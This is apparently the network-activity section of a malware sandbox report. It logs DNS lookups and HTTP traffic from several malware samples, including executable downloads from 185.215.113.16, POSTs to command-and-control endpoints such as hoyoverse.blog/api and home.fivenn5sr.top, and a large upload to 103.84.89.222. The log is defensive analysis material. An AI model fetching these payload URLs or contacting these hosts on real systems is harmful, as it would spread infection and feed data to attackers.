                                                                                              IN A
                                                                                              104.21.16.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.112.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.32.1
                                                                                              hoyoverse.blog
                                                                                              IN A
                                                                                              104.21.80.1
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cumYYlK5GIogxDudZnHjzKY%2BLQVgSAr5CzIjlYqLxc4POEIQ1a60tvpPZ7%2BatZkX2VXaKgZk3gzt7tpISXX2E1ROJH5aFhe7i30NByNG6tfsc9%2FS8wJCjjr3OrJmnmRyAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a672638d1cd72-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=feSzxHS.VL9WnxnG7FgjHFUG3.VjhEgwpfVsAiRwzac-1740011582-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 53
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=no9kvuoq23jf0fe8inb7lfr76o; expires=Fri, 21 Feb 2025 00:33:02 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3gOxvl7t32X%2FO0pjf2BdW%2FrAHVm57oIwIL4nvWMVXxDEqhIs4inHWwKRshHAGfna2R5zsHEX1NopUd8%2Bjkezei9tbErWdsQhM9TdT4o9Ev5xTq1R1fJxVD%2BhB%2B8tM9pr8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6726896ecd72-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=50826&min_rtt=42063&rtt_var=12807&sent=14&recv=13&lost=0&retrans=0&sent_bytes=8557&recv_bytes=1063&delivery_rate=194516&cwnd=257&unsent_bytes=0&cid=864b3fd3787df9ca&ts=454&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=2DSYXPNQUYXLU3
                                                                                              Cookie: __cf_mw_byp=feSzxHS.VL9WnxnG7FgjHFUG3.VjhEgwpfVsAiRwzac-1740011582-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1586
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:02 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=svtn9qtg8ujrk9r328l3o146nt; expires=Fri, 21 Feb 2025 00:33:02 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=byN6utRvyJCVtOeMEBECkB29vOl%2FyxKtO8cXQ2Q30sDw7eKSJfyKCfT5C7skfFA2BcenR6N16hNHyetSrRK149buQLI4g7flg2Cq1CScADWliRdXUqD2grFGnN%2BjO2P%2BMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67287d3ccd72-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=50138&min_rtt=42063&rtt_var=10980&sent=18&recv=17&lost=0&retrans=0&sent_bytes=9733&recv_bytes=3071&delivery_rate=194516&cwnd=257&unsent_bytes=0&cid=864b3fd3787df9ca&ts=683&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=0P4RCPCKDN
                                                                                              Cookie: __cf_mw_byp=feSzxHS.VL9WnxnG7FgjHFUG3.VjhEgwpfVsAiRwzac-1740011582-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1074
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:04 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=rnv0rd3tghr6cl15qsic6q93e0; expires=Fri, 21 Feb 2025 00:33:04 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhYE2GIuxpyeZrRjtwDOt6B9S3fyIZGFDSMXP06souaNDRuggErQnwqKVbjyDPKCZlDfmjV2ig9%2FuNWj153tYrsvCCbQOVnjsxb%2B8bC8M%2BbVb2uNrS5qIFvMMYsg8rpISA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6730fba876f9-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42521&min_rtt=42271&rtt_var=12301&sent=6&recv=7&lost=0&retrans=1&sent_bytes=3289&recv_bytes=1766&delivery_rate=93192&cwnd=253&unsent_bytes=0&cid=d18de8ca0eec8e47&ts=398&x=0"
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/testdef/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /testdef/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:01 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 961024
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:44:06 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66cc6-eaa00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/test/am_no.bat
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /test/am_no.bat HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:05 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2086
                                                                                              Last-Modified: Wed, 22 Jan 2025 23:08:37 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67917a75-826"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/luma/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /luma/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:54 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1886208
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:45:45 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66d29-1cc800"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/steam/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /steam/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:58 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1784832
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:45:55 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66d33-1b3c00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/well/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /well/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:01 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 971776
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:44:13 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66ccd-ed400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/test/exe/random.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /test/exe/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:04 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 961024
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:43:59 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66cbf-eaa00"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/test/amnew.exe
                                                                                              skotes.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /test/amnew.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:07 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 439296
                                                                                              Last-Modified: Thu, 30 Jan 2025 18:34:28 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "679bc634-6b400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://hoyoverse.blog/api
                                                                                              8827e2f2e3.exe
                                                                                              Remote address:
                                                                                              104.21.96.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=feSzxHS.VL9WnxnG7FgjHFUG3.VjhEgwpfVsAiRwzac-1740011582-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: hoyoverse.blog
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:05 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=hjhkvt6tl6r1m4sfum6177703g; expires=Fri, 21 Feb 2025 00:33:05 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwuyYQJwxpTSL0ZEl0L6TtRwwt1NZseva4RN1Yy%2BRSnssMi6%2B4GgYb80OAWxy4iFa4cbvKq885t6u28X6A9WK6zG7JFyTKZ2qUcsL5kjckv75q9UJ4JReTb04hFOUw1jFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6735dc266543-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=61074&min_rtt=42669&rtt_var=29147&sent=7&recv=6&lost=0&retrans=1&sent_bytes=3606&recv_bytes=770&delivery_rate=31802&cwnd=245&unsent_bytes=0&cid=7139dac9db65b0d8&ts=584&x=0"
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/defend/random.exe
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /defend/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:04 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1703936
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:44:45 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66ced-1a0000"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-hk
                                                                                              POST
                                                                                              http://103.84.89.222:33791/
                                                                                              0f807048bd.exe
                                                                                              Remote address:
                                                                                              103.84.89.222:33791
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                              SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                              Host: 103.84.89.222:33791
                                                                                              Content-Length: 137
                                                                                              Expect: 100-continue
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Length: 212
                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Date: Thu, 20 Feb 2025 00:33:14 GMT
                                                                                            • flag-hk
                                                                                              POST
                                                                                              http://103.84.89.222:33791/
                                                                                              0f807048bd.exe
                                                                                              Remote address:
                                                                                              103.84.89.222:33791
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                              SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                              Host: 103.84.89.222:33791
                                                                                              Content-Length: 144
                                                                                              Expect: 100-continue
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Length: 5051
                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Date: Thu, 20 Feb 2025 00:33:19 GMT
                                                                                            • flag-hk
                                                                                              POST
                                                                                              http://103.84.89.222:33791/
                                                                                              0f807048bd.exe
                                                                                              Remote address:
                                                                                              103.84.89.222:33791
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                              SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                              Host: 103.84.89.222:33791
                                                                                              Content-Length: 36748974
                                                                                              Expect: 100-continue
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Content-Length: 147
                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                              Date: Thu, 20 Feb 2025 00:34:36 GMT
                                                                                            • flag-hk
                                                                                              POST
                                                                                              http://103.84.89.222:33791/
                                                                                              0f807048bd.exe
                                                                                              Remote address:
                                                                                              103.84.89.222:33791
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                              SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                              Host: 103.84.89.222:33791
                                                                                              Content-Length: 36748966
                                                                                              Expect: 100-continue
                                                                                              Accept-Encoding: gzip, deflate
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/mine/random.exe
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /mine/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:33:11 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2134016
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:46:05 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66d3d-209000"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              DNS
                                                                                              ecozessentials.com
                                                                                              18b64e1917.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              ecozessentials.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              api.ip.sb
                                                                                              0f807048bd.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              api.ip.sb
                                                                                              IN A
                                                                                              Response
                                                                                              api.ip.sb
                                                                                              IN CNAME
                                                                                              api.ip.sb.cdn.cloudflare.net
                                                                                              api.ip.sb.cdn.cloudflare.net
                                                                                              IN A
                                                                                              104.26.12.31
                                                                                              api.ip.sb.cdn.cloudflare.net
                                                                                              IN A
                                                                                              104.26.13.31
                                                                                              api.ip.sb.cdn.cloudflare.net
                                                                                              IN A
                                                                                              172.67.75.172
                                                                                            • flag-us
                                                                                              GET
                                                                                              https://api.ip.sb/geoip
                                                                                              0f807048bd.exe
                                                                                              Remote address:
                                                                                              104.26.12.31:443
                                                                                              Request
                                                                                              GET /geoip HTTP/1.1
                                                                                              Host: api.ip.sb
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:20 GMT
                                                                                              Content-Type: application/json; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: no-cache
                                                                                              access-control-allow-origin: *
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YR5gsLGun9Q6tiireFzGqFuhT3bm7tOuxisShhfU4EYzPYPluyJANYXfd9SjzJg2NDafLSw5oNsO9dpfrzj8EZJFNYMAYKuae1aPM7dF5lDOUDSzJfcU6%2FXogQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67964f0463ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43880&min_rtt=43092&rtt_var=13693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2966&recv_bytes=357&delivery_rate=62926&cwnd=252&unsent_bytes=0&cid=76f416a4cb925ef6&ts=171&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              httpbin.org
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              httpbin.org
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              httpbin.org
                                                                                              IN AAAA
                                                                                              Response
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              52.22.198.150
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              3.214.119.249
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              3.208.239.150
                                                                                              httpbin.org
                                                                                              IN A
                                                                                              34.196.100.57
                                                                                            • flag-us
                                                                                              DNS
                                                                                              home.fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              home.fivenn5sr.top
                                                                                              IN A
                                                                                              Response
                                                                                              home.fivenn5sr.top
                                                                                              IN A
                                                                                              185.72.145.179
                                                                                            • flag-us
                                                                                              DNS
                                                                                              home.fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              home.fivenn5sr.top
                                                                                              IN AAAA
                                                                                              Response
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              185.72.145.179:80
                                                                                              Request
                                                                                              POST /DoDOGDWnPbpMwhmjDvNk1739958006 HTTP/1.1
                                                                                              Host: home.fivenn5sr.top
                                                                                              Accept: */*
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 449463
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              server: nginx/1.22.1
                                                                                              date: Thu, 20 Feb 2025 00:33:28 GMT
                                                                                              content-type: text/html; charset=utf-8
                                                                                              content-length: 26
                                                                                            • flag-us
                                                                                              DNS
                                                                                              friendseforever.help
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              friendseforever.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              shiningrstars.help
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              shiningrstars.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mercharena.biz
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mercharena.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              generalmills.pro
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              generalmills.pro
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              stormlegue.com
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              Response
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.16.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.96.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.64.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.112.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.48.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.32.1
                                                                                              stormlegue.com
                                                                                              IN A
                                                                                              104.21.80.1
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4DiwB%2BH8vrlSK1cMnCb4g0GKl%2BZWp5g6%2FREGgI%2FSN%2BINntXXSAly8zpzN2zC5IdOQqljH%2Bc5hm5%2Bx3BvWO0e8sHlezT7RzAw1bACAWH3RZvZ7gS9eFZzSBeECS7nevkaAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a67ca9b7c3d94-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              40e0b6ad21.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=mKmlT8o.g3ocveB07HuLrQ.fnYzPA5zzQkQDt59NDno-1740011608-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 43
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=m9o7m655asfp1c79ias1q636a0; expires=Fri, 21 Feb 2025 00:33:28 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IH6yBWBNU9fj7T6JnXtR8u0%2FVLR2LDKhg87i4vvWmhcjERpSwQFTpZimCS4jhr6%2BWa3KXU3UCzOow%2FQy7u%2B%2FIQA0MDktKae4gKyR2cJDeTn8wsJq%2Fz%2F6MH%2FKDyp6jIVSMw%3D%3D"}],"group":"cf-nel","max_age":604800}
